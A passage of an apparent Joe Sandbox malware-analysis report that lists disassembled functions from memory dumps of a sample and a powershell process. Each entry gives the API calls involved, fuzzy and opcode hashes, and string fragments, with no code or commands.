                                                                                                        • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrlen
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 2709904686-3976562730
                                                                                                        • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                        • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                                                        • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                        • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                        • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 190613189-0
                                                                                                        • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                        • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                                        • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                        • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b939f1705f33680e32b9b605537488f4e775dc0509774b5269f0085fcf4350d
                                                                                                        • Instruction ID: 340333001a7cae9c30cc01437646bf82cd9ee5593fad7fc737859bc51968a358
                                                                                                        • Opcode Fuzzy Hash: 0b939f1705f33680e32b9b605537488f4e775dc0509774b5269f0085fcf4350d
                                                                                                        • Instruction Fuzzy Hash: CC41B235A002148FDB15DB74C858AEDBBF6EFC9354F188468E406EB7A0DB74AD46CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$x.k$-k
                                                                                                        • API String ID: 0-3997674584
                                                                                                        • Opcode ID: 875decb8b8e7a267a2519d9abc7368a0f1d5054b17c38de0c773e5bebf242047
                                                                                                        • Instruction ID: b82a0677f86458eeb040fa53e4274498c5f52b92c84e07f41f1da9d88ede45bc
                                                                                                        • Opcode Fuzzy Hash: 875decb8b8e7a267a2519d9abc7368a0f1d5054b17c38de0c773e5bebf242047
                                                                                                        • Instruction Fuzzy Hash: 8C82CFB4B00215DFDB25CF58C954BAABBB2AF85300F15C0A9D909AF381CB72ED45CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3499190445
                                                                                                        • Opcode ID: 9944975cb1d36a79fd49a997261524ba0654fc5da667816421b8fb281e017734
                                                                                                        • Instruction ID: a0c1947657945e063a0f07a77f440865cc9ca404504ed6aff608c7ac87519b18
                                                                                                        • Opcode Fuzzy Hash: 9944975cb1d36a79fd49a997261524ba0654fc5da667816421b8fb281e017734
                                                                                                        • Instruction Fuzzy Hash: 3BE1B1B4B10206DFDB1ADB65C555BAEBBB2AF88304F25C028E9056F3C5CB35ED428B51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3832083339
                                                                                                        • Opcode ID: 44993ed21bf3da6396e8602f7dd072b3e01c585e2e9f1444bd6b907074241be7
                                                                                                        • Instruction ID: 0c6eb1e4aaec078841fb8186804528c8e6b509e38bfeab62e437c34d2549db84
                                                                                                        • Opcode Fuzzy Hash: 44993ed21bf3da6396e8602f7dd072b3e01c585e2e9f1444bd6b907074241be7
                                                                                                        • Instruction Fuzzy Hash: 0D225FB4B003189FD725DB58C951B9BBBB2AF89304F118198D909AF791CB72ED42CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3832083339
                                                                                                        • Opcode ID: 45aec612460f0f12ba7fbf425ec97be4330097b566b29f428dc5d9db69623e60
                                                                                                        • Instruction ID: f4d89ce39e083eaf4827c6d0ef72baf7a1f59af98520ca45eb7e9d7913cc00ba
                                                                                                        • Opcode Fuzzy Hash: 45aec612460f0f12ba7fbf425ec97be4330097b566b29f428dc5d9db69623e60
                                                                                                        • Instruction Fuzzy Hash: F5C1CDB8A10206EFDB1ACB54C540BAEBBB2AF88314F15C059E8057F3D5CB36ED428B51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3832083339
                                                                                                        • Opcode ID: 77ea4b8fb4f0541f56ba65986e317644929dbbb5249f064a4c06d11eca137e70
                                                                                                        • Instruction ID: e60b66c8e93404ac4076376fd233c7bb2b2a0a77af7537c513c70ceca3d266ad
                                                                                                        • Opcode Fuzzy Hash: 77ea4b8fb4f0541f56ba65986e317644929dbbb5249f064a4c06d11eca137e70
                                                                                                        • Instruction Fuzzy Hash: BDC1BCB8A10206EFDB1ACB54C540BAEBBB2AF88314F15C059E9057F3D5CB36ED428B51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: 587bef8360a5a45e822b96e2391a4f123a62f812410b0d51b41188234c3ca45f
                                                                                                        • Instruction ID: 45dd66e1924869d2243ab0bfe5c8c16d12db7c67e72de58a7797ef816bc3f556
                                                                                                        • Opcode Fuzzy Hash: 587bef8360a5a45e822b96e2391a4f123a62f812410b0d51b41188234c3ca45f
                                                                                                        • Instruction Fuzzy Hash: A4526CB4B10215DFD725DF18C951B6ABBB2BB88304F15C099D909AF391CB72ED82CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: db6ec3bfe0d6309f7e042faf2681438cda0b69e0ad62775761f1e38855947780
                                                                                                        • Instruction ID: 6056599ccd2e2237d5e72db0583e5ca97b8ff3a7815a06c0edccc257722e3e9e
                                                                                                        • Opcode Fuzzy Hash: db6ec3bfe0d6309f7e042faf2681438cda0b69e0ad62775761f1e38855947780
                                                                                                        • Instruction Fuzzy Hash: CB425AB4A10215DFDB25CF58C954B6ABBB2BB84304F15C099D909AF391CB72ED81CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: 14d0324526eb07ce089e9427bbce07d59336219fbd30ad4fc63fb0522151c06f
                                                                                                        • Instruction ID: 5b40d003bddf8a2f6b7b28b87e8fa02268141f21882291097b2812419d306bfd
                                                                                                        • Opcode Fuzzy Hash: 14d0324526eb07ce089e9427bbce07d59336219fbd30ad4fc63fb0522151c06f
                                                                                                        • Instruction Fuzzy Hash: 4B4260B4B003189FD725DB58C951BAABBB2AB89304F11C199D9099F391CB72ED42CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: c17fcfb79b0ec293a72324b88f5bc9df193b0a2754e20cf7a798b3df0c3e7cc2
                                                                                                        • Instruction ID: 31e83b5e207caa67df96acb0dd42cc51b2ef2275bb5c1748e704a797b9e368e2
                                                                                                        • Opcode Fuzzy Hash: c17fcfb79b0ec293a72324b88f5bc9df193b0a2754e20cf7a798b3df0c3e7cc2
                                                                                                        • Instruction Fuzzy Hash: 12226CB4B102149FD725DF14C955B6ABBB2BB88304F15C098DA09AF391CB72ED85CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        • Instruction Fuzzy Hash: A2715F74A002489FDB14EFA5D554BADFBF2BF88308F24C429D411AB7A0DB74AD4ACB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b4c547e14cd7e45da9f2c376b476103db6d5115a05fd59363dbd2ccbb83283d
                                                                                                        • Instruction ID: 8826e7c6325442894bd99f2dc2ad028c2f8b3901336546023b485e66d467c69d
                                                                                                        • Opcode Fuzzy Hash: 8b4c547e14cd7e45da9f2c376b476103db6d5115a05fd59363dbd2ccbb83283d
                                                                                                        • Instruction Fuzzy Hash: 20514C74E006499FCB15CF58C880AAEBBF1FF49310B298259E855AB3A1D735EC42CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37b27bc76ec70f151da7c5f1b32cbf88a60b2bf9c67279a20939581937fe56d9
                                                                                                        • Instruction ID: 1045b6b3f46fcf690ffbdc18b5214cf2655e2295ca685c9fb08ed9a46a370a77
                                                                                                        • Opcode Fuzzy Hash: 37b27bc76ec70f151da7c5f1b32cbf88a60b2bf9c67279a20939581937fe56d9
                                                                                                        • Instruction Fuzzy Hash: 16417170A002588FDB24DFA5C854BEDFBB2BF85354F14C469D005AB751EBB0AD49CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 074976bbf2a0da37b25ca37839454ceea743534647f66a081c373266510842b3
                                                                                                        • Instruction ID: 6847cbecb9232747b6ad63ed05126cc0129f91446b64a25bf1e15743f549f730
                                                                                                        • Opcode Fuzzy Hash: 074976bbf2a0da37b25ca37839454ceea743534647f66a081c373266510842b3
                                                                                                        • Instruction Fuzzy Hash: D7414230A002048FDB15EB75C4557AEBAF7AFC8311F18C469D806AB795DF719C428BA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e91952f612bbbae8f9598530db5aba32a89d5661c6dfac77eba5d2539f19235d
                                                                                                        • Instruction ID: a3a3c133b0f9bf12dc3d5bda1f1752aa60aef7220c2d3bb3593d3cd6b37e5b08
                                                                                                        • Opcode Fuzzy Hash: e91952f612bbbae8f9598530db5aba32a89d5661c6dfac77eba5d2539f19235d
                                                                                                        • Instruction Fuzzy Hash: A551C834A00209DFDB15CFA8D584A9DBBB2FF88315F288559E405AB365C775AD82CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d06c9f7185babcd7313d996ee23830de1d4393eab8f7acac2aff9ca1572d4424
                                                                                                        • Instruction ID: 257845f8719efed7a9c65501ded7a5a4366640a6af5c177d1a22f412e56048e1
                                                                                                        • Opcode Fuzzy Hash: d06c9f7185babcd7313d996ee23830de1d4393eab8f7acac2aff9ca1572d4424
                                                                                                        • Instruction Fuzzy Hash: F3413F74A006099FCB15CF98C990AAEB7F1FF4C320B258259E925A73A4C735EC52CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c8d4ac8c6f2912a8d8d2edfd4266946a35aa4387351f7a5a0dd0751dcfe8bfce
                                                                                                        • Instruction ID: 2e3bc061be7daadde547ff69e1f9b0feda4313f7c245d9b2a05095d3a9af9edf
                                                                                                        • Opcode Fuzzy Hash: c8d4ac8c6f2912a8d8d2edfd4266946a35aa4387351f7a5a0dd0751dcfe8bfce
                                                                                                        • Instruction Fuzzy Hash: E5412974A016098FCB15CF9CC984AAEB7F2FF49320B288259E815EB355D335ED42CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 84a989506ac9bc01951730c58a5da8c16f8cea1e98b09f123cdb41f226b00ae1
                                                                                                        • Instruction ID: 80c1319f8f5710cbb430fe0fd0241a14787942eddabbd524bf236ade82ee59fe
                                                                                                        • Opcode Fuzzy Hash: 84a989506ac9bc01951730c58a5da8c16f8cea1e98b09f123cdb41f226b00ae1
                                                                                                        • Instruction Fuzzy Hash: 33411D74E006059FCB15CF9CC8849AEB7F1FF48321B698259E825A7364D335ED52CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f0036f8a7008118eef9e53b716fa895feab4b89bef76bb610635987c31e69d2b
                                                                                                        • Instruction ID: fca1df20942159eda75d57b1c528c1b89e1f0fe27849e9043a74bf8ac44178c4
                                                                                                        • Opcode Fuzzy Hash: f0036f8a7008118eef9e53b716fa895feab4b89bef76bb610635987c31e69d2b
                                                                                                        • Instruction Fuzzy Hash: 99418A74A006058FDB15CF58C498EBAFBB1FF88318B15825AD911AB360C736FD91CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 62625ab7c1ba2000f440ac9590d7b2a9d2fc11d21fae775d14b884e7b22ffe46
                                                                                                        • Instruction ID: 69a98b066b92d2ab88aee2f3df40d1f19125a6f398d95c66c766f07613d1a234
                                                                                                        • Opcode Fuzzy Hash: 62625ab7c1ba2000f440ac9590d7b2a9d2fc11d21fae775d14b884e7b22ffe46
                                                                                                        • Instruction Fuzzy Hash: E9319DFD710202AFEB1B4A7595117B6BFA29FC1211F18847AD606DB3C1DB31D881C3A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0658532a4580f126b1e88086c028aff11978d97576a53b4869e8e2df86089f0
                                                                                                        • Instruction ID: 3b6fda39a19c80eace27a79c21b9a9637a3a94d1a4fd30c7c720ec04335307ea
                                                                                                        • Opcode Fuzzy Hash: b0658532a4580f126b1e88086c028aff11978d97576a53b4869e8e2df86089f0
                                                                                                        • Instruction Fuzzy Hash: 6E310774E00609DFDB14CF99C594AAAF7F2FF88310B248259E959AB751C731ED82CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c7fbca2e79e3388c74b29a2f735619b41e91aa43114e57054c9a184091d7b7c
                                                                                                        • Instruction ID: 86c2c52b12aa292a271c47cf2e18371a16fd0bc75b78d6dbf955d2f8de6e902e
                                                                                                        • Opcode Fuzzy Hash: 6c7fbca2e79e3388c74b29a2f735619b41e91aa43114e57054c9a184091d7b7c
                                                                                                        • Instruction Fuzzy Hash: F3317E70A083598FCB01DF68D890AAABBB0FF4A314F158097E845EB352D735EC45CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 91cede5a4164e37a49cc51039ae7bc5e09525cf8a04041e95fd25240b4fb193a
                                                                                                        • Instruction ID: 500d5122b8c6abfada53db1d8b88e20041c65ad39143da2dbb4fb2a53d5d113e
                                                                                                        • Opcode Fuzzy Hash: 91cede5a4164e37a49cc51039ae7bc5e09525cf8a04041e95fd25240b4fb193a
                                                                                                        • Instruction Fuzzy Hash: 6C217175A093898FCB02DB58D890A99BBB0FF4A310B198197D855EB392C335ED45CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4e95ff6bbac32360d6be327cb197fa38b395d1425e66e4181fc61662fc9d8aec
                                                                                                        • Instruction ID: 4c25523ab16a86e306b077251e57e94552c67dfc7038cfbc08b8155e497b5d3c
                                                                                                        • Opcode Fuzzy Hash: 4e95ff6bbac32360d6be327cb197fa38b395d1425e66e4181fc61662fc9d8aec
                                                                                                        • Instruction Fuzzy Hash: 33014EB2E002165BD7265A781C1166E7722AFC1224F1505BBCE015F3C3EB325D1283D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b115cf8f74fa010c5c6ac030778e911b5fda31b727ab383dba908714e1c96fa
                                                                                                        • Instruction ID: ef77b35d09cdf1c94eba7de7d6065eb456f67ecacd946ecbcf9cfb5445a924be
                                                                                                        • Opcode Fuzzy Hash: 0b115cf8f74fa010c5c6ac030778e911b5fda31b727ab383dba908714e1c96fa
                                                                                                        • Instruction Fuzzy Hash: F31164B1C003098FDB20DFAAC8457AEBBF5AF89324F14842ED459A7640CB359A41CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 04aa20bf066263463da8bdccaa9cc9bf0d76202ab4fbccb10be16adc69e9194a
                                                                                                        • Instruction ID: 6889999111c97a22bd31eb0ace90c822c0328ab388563c5029a2f3fd23318a3e
                                                                                                        • Opcode Fuzzy Hash: 04aa20bf066263463da8bdccaa9cc9bf0d76202ab4fbccb10be16adc69e9194a
                                                                                                        • Instruction Fuzzy Hash: 1A114671D003088FDB20EFAAC445BAEFBF5AB89324F148429D415A7240CB35A940CBA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa33f296286e761bec1606d981e9a4887534cc1e2f5a1d61f824ef4e2ae03c10
                                                                                                        • Instruction ID: 78c4c79b99d0a496f93116b93216ce58738dfa6698bc972fb1ddf8d0dc9bbfd4
                                                                                                        • Opcode Fuzzy Hash: fa33f296286e761bec1606d981e9a4887534cc1e2f5a1d61f824ef4e2ae03c10
                                                                                                        • Instruction Fuzzy Hash: 7ED02EBBF1012097822A2068BC100EAB386A7E92B070100B3C902C7340EB328C2683A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de05a80fc61d9dc9698e4a036c5a4c7c80ae49013ae6a9a1b79cb6cf1ab0000b
                                                                                                        • Instruction ID: c893072c138772bc1fccca41011379e9648a23a8c61e9ab1437d7e3872d538a5
                                                                                                        • Opcode Fuzzy Hash: de05a80fc61d9dc9698e4a036c5a4c7c80ae49013ae6a9a1b79cb6cf1ab0000b
                                                                                                        • Instruction Fuzzy Hash: 41E01A71C00244DFC750DFB8C94115EBFF0AB1A210B2484EEC448D7221E2328652CB81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                        • Instruction ID: 63c4a3ef3279289effebbb0e3d78bad1032efb7849da4a2b4ba4430e45c69dab
                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                        • Instruction Fuzzy Hash: 9BD042B1D042099F8780EFA9894156EFBF4AB59204B6085AE8959E7201E6329A128BD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
